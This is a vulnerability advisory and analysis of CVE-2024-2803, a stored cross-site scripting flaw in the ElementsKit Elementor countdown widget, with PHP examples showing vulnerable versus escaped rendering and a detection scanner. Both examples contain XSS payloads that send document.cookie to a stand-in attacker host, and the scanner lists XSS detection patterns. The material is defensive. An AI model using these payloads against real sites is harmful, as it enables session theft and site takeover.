CVE-2024-2803 in ElementsKit Elementor Addons Plugin
Summary
by MITRE • 04/04/2024
The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown widget in all versions up to, and including, 3.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Analysis
by VulDB Data Team • 04/09/2025
CVE-2024-2803 is a stored cross-site scripting flaw in the ElementsKit Elementor addons plugin for WordPress, affecting all versions up to and including 3.0.6. The bug sits in the plugin's countdown widget: attributes that a user sets on the widget are neither sanitized when the widget configuration is saved nor escaped when the widget is rendered, so a value that closes an HTML attribute or tag is written into the page verbatim. Because the widget configuration is stored with the post, the injected markup persists and is served to every visitor of the affected page.
The weakness is CWE-79, Improper Neutralization of Input During Web Page Generation, in its stored form: the payload is kept server-side and executes each time someone loads the page, rather than only in the response to one crafted request. Exploitation requires an authenticated account at contributor level or above. That threshold is low for a WordPress site. Contributors can create and edit their own posts but cannot publish them or change site settings; a stored XSS lets such an account run JavaScript in the browser of whoever views the page, including the editors and administrators who review it, and from that context act with the viewer's privileges.
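The bug class described above, as an added illustration rather than code from the plugin or from VulDB: a widget render function that interpolates user-controlled settings straight into HTML, next to one that escapes each value for the context it lands in. The markup, the setting names `due_date` and `label`, the sample payload and the stand-in `esc_attr()`/`esc_html()` definitions are assumptions; inside WordPress the real functions from wp-includes are used.

```php
<?php
// Added illustration of attribute/text injection through an unescaped widget
// setting. NOT ElementsKit's code: markup, setting names and payload are assumed.

// Stand-ins so the script runs outside WordPress. Within WordPress the real
// esc_attr()/esc_html() are already defined and these blocks are skipped.
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable pattern: settings editable by anyone who can edit the post
// (contributors and up) are concatenated directly into the page.
function render_countdown_vulnerable(array $settings): string {
    return '<div class="countdown" data-date="' . $settings['due_date'] . '">'
         . '<span class="label">' . $settings['label'] . '</span></div>';
}

// Hardened pattern: values with a known shape are re-serialised in canonical
// form (unparseable input becomes empty), and every value is escaped for the
// exact context it is written into: attribute value vs. text node.
function render_countdown_hardened(array $settings): string {
    $ts   = strtotime((string) ($settings['due_date'] ?? ''));
    $date = ($ts === false) ? '' : gmdate('Y-m-d H:i:s', $ts);
    $label = (string) ($settings['label'] ?? '');
    return '<div class="countdown" data-date="' . esc_attr($date) . '">'
         . '<span class="label">' . esc_html($label) . '</span></div>';
}

// Constructed payload: one value breaks out of the data-date attribute and adds
// an event handler, the other injects a tag into the text node.
$payload = [
    'due_date' => '2030-01-01" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)',
    'label'    => '<img src=x onerror=alert(document.domain)>',
];

echo "vulnerable:\n" . render_countdown_vulnerable($payload) . "\n\n";
echo "hardened:\n"   . render_countdown_hardened($payload)   . "\n";
```

Run it with `php countdown.php`: the vulnerable output carries the `onmouseover` handler and the `<img>` tag intact, the hardened output only entity-encoded text. The same split applies on the way in: a strict whitelist or `sanitize_text_field()` when the setting is saved, then `esc_attr()`, `esc_html()`, `esc_url()` or `wp_kses()` at output, chosen by where the value is written.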
Operationally, a site running a vulnerable ElementsKit version exposes every visitor of an injected page to script chosen by the attacker: session cookies not marked HttpOnly can be read, forms can be altered to capture credentials, visitors can be redirected elsewhere, and the page can be defaced. Script that runs in an administrator's browser can also issue authenticated requests to wp-admin on their behalf, which is how a contributor-level foothold becomes full site compromise. Since the payload is stored, it keeps firing until the content is cleaned up, and the number of affected users scales with the page's traffic.
Mitigation starts with updating ElementsKit to version 3.0.7 or later, where the escaping has been fixed. Beyond patching, limit who holds contributor access and which roles may edit with Elementor, review contributor-submitted content before it is published, and place a web application firewall in front of the site to block obvious script payloads in content edits. On the detection side, watch for new or changed posts whose Elementor data contains script tags, event-handler attributes or javascript: URLs, and for contributor accounts editing pages they did not create. The root cause is the familiar one for content management systems: validate on input and escape on output for the exact context (attribute, text node, URL) the value lands in. In ATT&CK terms the issue is delivery of malicious script through a legitimate site (T1189, Drive-by Compromise) followed by JavaScript execution in the victim's browser (T1059.007, Command and Scripting Interpreter: JavaScript).
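One way to implement the monitoring step above, added here as an example and not taken from VulDB or ElementsKit: a scan over the JSON that Elementor stores in the `_elementor_data` post meta, flagging any widget setting that contains a script tag, an event-handler attribute or a javascript: URL. The sample document is constructed, and the widgetType value `elementskit-countdown-timer` is an assumption; use whatever type name your installation actually stores.

```php
<?php
// Added detection example (not VulDB's or ElementsKit's code). Walks an
// Elementor element tree and reports settings that look like XSS payloads.
// Heuristic patterns: matches are leads for manual review, not verdicts.

const SUSPICIOUS_PATTERNS = [
    '/<\s*script\b/i',        // inline <script> tag
    '/\bon[a-z]+\s*=/i',      // event handler attribute: onerror=, onload=, ...
    '/javascript\s*:/i',      // javascript: URL scheme
    '/<\s*(iframe|svg|img|object|embed)\b/i', // tags commonly used for handler smuggling
];

// Collect every string reachable inside a setting value (Elementor nests
// arrays for repeaters and typography, so recurse rather than cast).
function flatten_strings($value): array {
    if (is_string($value)) {
        return [$value];
    }
    if (is_array($value)) {
        $out = [];
        foreach ($value as $v) {
            $out = array_merge($out, flatten_strings($v));
        }
        return $out;
    }
    return [];
}

// Recursively scan sections -> columns -> widgets, recording the path to each hit.
function scan_elementor_tree(array $elements, string $path = '', array &$findings = []): array {
    foreach ($elements as $i => $el) {
        $kind = $el['widgetType'] ?? $el['elType'] ?? 'element';
        $here = $path . '/' . $kind . '[' . $i . ']';
        foreach ((array) ($el['settings'] ?? []) as $key => $value) {
            foreach (flatten_strings($value) as $s) {
                foreach (SUSPICIOUS_PATTERNS as $re) {
                    if (preg_match($re, $s)) {
                        $findings[] = ['path' => $here, 'setting' => $key, 'pattern' => $re, 'value' => $s];
                        break; // one report per string is enough
                    }
                }
            }
        }
        if (!empty($el['elements']) && is_array($el['elements'])) {
            scan_elementor_tree($el['elements'], $here, $findings);
        }
    }
    return $findings;
}

// Entry point: takes the raw meta_value string as stored in wp_postmeta.
function scan_post_meta(string $json): array {
    $tree = json_decode($json, true);
    return is_array($tree) ? scan_elementor_tree($tree) : [];
}

// Constructed sample: a benign heading plus a countdown widget whose label
// setting carries a handler injected by a contributor. widgetType is assumed.
$sample = json_encode([[
    'id' => 'a1b2c3', 'elType' => 'section', 'settings' => [],
    'elements' => [[
        'id' => 'd4e5f6', 'elType' => 'column', 'settings' => [],
        'elements' => [
            ['id' => '111111', 'elType' => 'widget', 'widgetType' => 'heading',
             'settings' => ['title' => 'Launch day']],
            ['id' => '222222', 'elType' => 'widget', 'widgetType' => 'elementskit-countdown-timer',
             'settings' => ['due_date' => '2030-01-01 00:00',
                            'label' => '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">']],
        ],
    ]],
]]);

foreach (scan_post_meta($sample) as $f) {
    printf("%s setting=%s matched=%s\n  %s\n", $f['path'], $f['setting'], $f['pattern'], $f['value']);
}
```

To run it against a live site, feed `scan_post_meta()` the output of `wp post meta get <post_id> _elementor_data`, or iterate over `SELECT post_id, meta_value FROM wp_postmeta WHERE meta_key = '_elementor_data'`. Pair hits with the post's author and last-modified time to spot contributor accounts touching content they should not.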